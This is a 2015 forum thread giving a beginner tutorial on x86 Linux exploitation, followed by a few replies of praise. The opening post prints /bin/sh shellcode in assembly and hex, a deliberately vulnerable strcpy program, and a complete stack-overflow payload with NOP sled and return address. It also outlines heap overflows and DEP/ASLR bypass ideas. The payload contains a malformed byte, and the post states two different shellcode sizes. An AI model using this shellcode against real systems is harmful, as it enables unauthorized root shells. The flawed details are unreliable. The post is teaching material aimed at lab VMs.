An introduction to software exploitation

09-29-2015, 08:55 PM #1

Specter

Pro Memer

921

Posts

44,457

Reputation

2,940

Credits

Former Staff

Aug 2012

NextGenUpdate

(adsbygoogle = window.adsbygoogle || []).push({}); I highly recommend you learn Intel x86 Assembly before going through this thread, or you'll be lost. I have a thread You must login or register to view this content.. I also recommend you get at least some familiarity with the hexadecimal (base 16) number system. By the end of this thread you'll nearly forget the decimal system exists, that's how much binary data and memory addresses we'll be dealing with.

Preface: Most of the stuff you find in this thread won't work for modern day software or computers, however it is essential you understand the basic fundamentals and such of exploitation. Why? Modern exploitation is more difficult and complex than it used to be, but the principles remain the same, however more steps are needed to get code execution.

To start off, if you're new into exploitation you might not understand what the above means. Why is exploitation harder today? Developers realized that bugs will always be present, before, now, and forever. So instead of trying to fix bugs, they shifted to fixing and patching the exploits that utilize these bugs. Also exploits are different than vulnerabilities, I'd like to clear this up now. Vulnerabilities are bugs in programs that can potentially be used for exploitation. Exploits themselves are the actual payloads that are crafted to gain code execution. Because of developers trying to patch exploits, the way they do this is via methods such as DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization). We'll talk about these later, and how DEP can be bypassed.

For code examples if you want to work through them, I would recommend using a wargame VM or using Damn Vulnerable Linux, as it should have Data Execution Prevention and Address Space Layout Randomization turned off.

Shell and shellcode: Generally through exploitation you don't just want to print different pretty text, you want to invoke a shell. Why? An extreme example would be something like the PS3. If you can exploit a program on it, you can gain shell access. Even better is the fact that the program you invoke the shell from, the shell will have the same privileges as the program itself, so if the program is running as root (uid0) and you manage to exploit it, you just gained root access to the system.

Now generally speaking shellcode is obsolete now due to Data Execution Prevention (DEP), but I'll still cover it because it could be used today, and it can be used in wargames and competitions as well. These shellcode payloads are written using Intel x86 Assembly, this is exactly why I put the notice saying you want some sort of background with assembly. When it comes to exploitation, you want your payload to be as small as possible. Even if the buffer you need to fill is 64 bytes and gives you plenty of room, you give yourself more lee-way as you give yourself more space for your NOPSled (we'll talk about this shortly as well).

There's tons of shellcode payloads all over the internet, but I recommend you study the code below to actually understand how it works. Now because we want our payload to be small, we can't just insert a C program using "execve("/bin/sh");", the payload would be huge and wouldn't work. You may compile a program and think "wow, 141kb that's small!". Well, we're going to create a program that invokes a shell in just 30 bytes. You could get this even lower, down to 23 bytes if you want, but I'll just be providing my payload. It's not perfect but it works.

The Steps

*. First we need to realize that in order to invoke the shell we're going to need to call a syscall, syscall 11 specifically (execve). Syscalls are special, as they use the registers rather than the stack for passing arguments. The syscall number is always stored in the eax general purpose register.

1. We need to clear out all the registers, you could probably get away with not clearing all of them, but to be safe we will. One little snag though that I'll briefly cover, we cannot simply perform an instruction like "mov eax, 0", the reason for this is it will give us a null byte (0x00) in our payload (you can try it and see for yourself). We cannot have null bytes in our payload, as if you know C, you'll most likely know that a null terminator is used to signify the end of a string, therefore if our payload execution hits a null byte, it'll stop mid-execution and won't work, if not segfault.

2. We need to move 11d, or 0xB into the eax register (since we're calling syscall 11). Now we can't just "mov eax, 11" either, because we'll get bad bytes in our payload. Instead, we will move 11 into the lower portion of the eax register, meaning we'll move it into al ("a" lower).

3. We're going to push ebx unto the stack.

4. Now we need the string "/bin/sh" for the second argument, since that's what we're calling. We can't reliably store this in the data section, fixed addresses are bad. To get around this, we will push the ascii representation of it on the stack. Now you're most likely using a little endian machine (if you don't know what this means, refer to my assembly thread), so addresses and such will be stored in reverse order, with the right-most byte being the most significant, and the bytes to the left being less significant. This also applies to "/bin/sh". Another problem you'll see is addresses are 4 bytes, but "/bin/sh" is only 7, we need 8. Luckily, we can just add another "/" in there to make it 8 and it will still work fine. This will make our string "/bin//sh". We will push this in this exact order, 0x68732f2f (hs//), then 0x6e69622f (nib/), leaving us with "hs//nib/", which is "/bin//sh" reversed.

5. Now we will move the esp (stack pointer) into ebx. Why? The stack pointer currently points at our string, "hs//nib/", and ebx is our argument for our syscall.

6. We push ecx and ebx on the stack.

7. Move the stack pointer into the ecx register.

8. Finally we interrupt with 0x80 to call our syscall.

It may seem like a lot, but it's not. We now have invoked a shell in 8 easy steps.

The ASM

    section .text



global _start



_start:

xor eax, eax

xor ebx, ebx

xor ecx, ecx

xor edx, edx

mov al, 11

push ebx

push 0x68732f2f

push 0x6e69622f

mov ebx, esp

push ecx

push ebx

mov ecx, esp

int 0x80

Well we can't just insert these instructions into the stack and expect it to work... or can we? All we need to do is compile this with nasm using "nasm -f elf [filename].asm". Now we need to use "objdump -d [filename]". This will give us the binary of our shellcode. We're now ready to build our payload, below is the binary of the above shellcode;

    31 c0

31 db

31 c9

31 d2

b0 0b

53

68 2f 2f 73 68

68 2f 62 69 6e

89 e3

51

53

89 e1

cd 80

Buffer Overflows: Ok, now let's say we were exploiting the following C program:

    #include <stdio.h>



int main(int argc, char **argv)

{

      char buff[64];

      strcpy(buff, argv[1]);

      return 0;

}

So we have a 64 byte buffer that we need to overflow, however we also need to modify our EIP (instruction pointer) to point to our payload, or it won't execute. Generally speaking (it can vary, your best bet is utilizing GDB to find your exact addresses), you'll need to overwrite 4 bytes of garbage (the ebp), then the next 4 bytes will the instruction pointer. If you get "Illegal Instruction" or "Segmentation Fault", you're pointing to a bad memory address and need to change your payload. To actually create and load this payload, we'll use perl (yay).

First, we know our payload is 29 bytes. We need to fill a 64 byte buffer to overflow it. So, you could, if you wanted to be a perfectionist, insert garbage or null bytes for the first (64 - 29 = 35 bytes). If you want your payload to actually have a better chance of working and could really care less, you're going to add a NOPSled. A NOP instruction exchanges (xch) eax with eax, so it essentially does nothing as the name implies. The good thing about this instruction is if we land our EIP on any of these nops, even if it's not our shellcodes first instruction, we're golden. If we add nulls, we have to hit the first instruction on the dot. A nop in binary is 0x90. We will add 35 nops, our shellcode, 4 bytes of trash, and a return instruction into our payload.

Now, for tutorial sake, I'm going to say I went into gdb and found one of my NOPS to be 0x080482AA (basic debugging can be found at the end of the thread), we are working with little endian, meaning when we store this we'll have to store it in reverse. In the end, our command to construct our payload will be (\x is an escape sequence for printing hex):

    \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x0b\x53\x68\x\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe1\xcd\x80\x41\x41\x41\x41\xaa\x82\x04\x08

Congratulations, if everything worked out, you now have a shell running off the program you exploited, with the same permissions as the program had.

Heap Overflows: Heap overflows are more complex than stack overflows, this is because the stack can be directly manipulated by the program easily. With the heap it's not such an easier process, they are also harder to find, therefore in the real world, you'll have a much better bet finding heap overflows than stack overflows, developers are becoming wise. Unlike the stack section, I'm not going to go into a complete tutorial on how to exploit it, but I will say this; the heap is generally used for global variables and such, but is also used when the programmer calls an allocation such as malloc(). This allocates chunks of data to the program for usage, however calling the syscall (nbrk) is very slow, therefore good (most) allocators will do tons of optimization, one of which being that if the program requests 256 bytes for an allocation and there's a 256 (or two 12 Cool Man (aka Tustin)

byte chunks, it will reuse this chunk instead of calling for more memory from the operating system. How heap overflows work is via overflowing the current chunk with a payload (except if DEP is enabled, then you'd have to use ret2libc), and precisely overflow the meta of the next chunk. Each chunk has metadata on it saying if it's 1. available, 2. the size, 3. a pointer to the previous free chunk, 4. a pointer to the next free chunk (think of this as a linked list). We need to overwrite "availability" and "size" with garbage to get to the pointers. Once we get to the pointers, you can go about this in multiple ways. You can use the GOT (Global Offset Table), or a return address, this is what you will write to the "previous free" pointer. You will write the address in which you want to call in the global offset table or what you want the return address to be in the "next free" pointer. Complicated, as I said I won't be covering heap overflows here, maybe in another tutorial if it's requested.

Protection Mechanisms: Developers started to realize patching bugs was never going to work and was a losing battle, so they decided to patch exploitation instead. These mechanisms make everything above either even more difficult or impossible. We'll talk about two of these mechanisms;

DEP or Data Execution Prevention AKA. StackShield. This nifty little feature makes the program distinguish between data and executable code where it otherwise would not have, meaning that our above methods where we inject shellcode into memory and try to access it, won't work. You'll most likely get a segfault, or it just won't work. Modern linux distros and windows force this upon the operating system, so unless you turn it off, it doesn't matter what program you're attempting to exploit, DEP will block shellcode execution. This is bypassed using the GOT or Global Offset Table, because (at least in linux), libc is included with any and every C program regardless. If you can get the address of "execve", you can call it and pass it the "/bin/sh" address.

ASLR or Address Space Layout Randomization. This is a true nightmare for those who wish to exploit a program. Basically, ASLR or DEP are defective and are easy to get around. DEP and ASLR combined, is not fun for exploitation. This feature randomizes the addresses, making guessing impractical and our little GOT method useless. I'm not talking about how to bypass ASLR in this tutorial, however it's only really effective on 64 bit systems, as 32 bit systems don't have a large enough entropy to make guessing too much of an issue.

Last edited by Specter ; 09-29-2015 at 09:57 PM.

The following 9 users say thank you to Specter for this useful post:

Helping-Hand, iAmRishi, Joren, Kryptus, Mango_Knife, oneksouf,

Darth Saul, Scouse Power

09-29-2015, 08:57 PM #2

Scouse Power

Knowledge is power

399

Posts

26,584

Reputation

75

Credits

Former Staff

Oct 2014

NextGenUpdate

You are on fire

You must login or register to view this content.

09-29-2015, 08:59 PM #3

Joren

.

519

Posts

32,560

Reputation

1,203

Credits

Former Staff

Jun 2014

NextGenUpdate

Another awesome, detailed tutorial.
Very nice work man! Tiphat

09-30-2015, 09:22 PM #4

vRice

Haxor!

29

Posts

150

Reputation

39

Credits

Member

Apr 2014

NextGenUpdate

"I highly recommend you learn Intel x86 Assembly before going through this thread"

aaaaand I'm leaving, skimmed it though and it seems useful to some people... not me, but some people haha

10-01-2015, 08:12 AM #5

Hash847

Purple God

1,502

Posts

21,668

Reputation

33

Credits

Former Staff

Aug 2012

NextGenUpdate

good job

04-19-2020, 07:22 AM #6

Seth_Black

Keeper

13

Posts

10

Reputation

22

Credits

Member

Aug 2013

NextGenUpdate

I Love You <3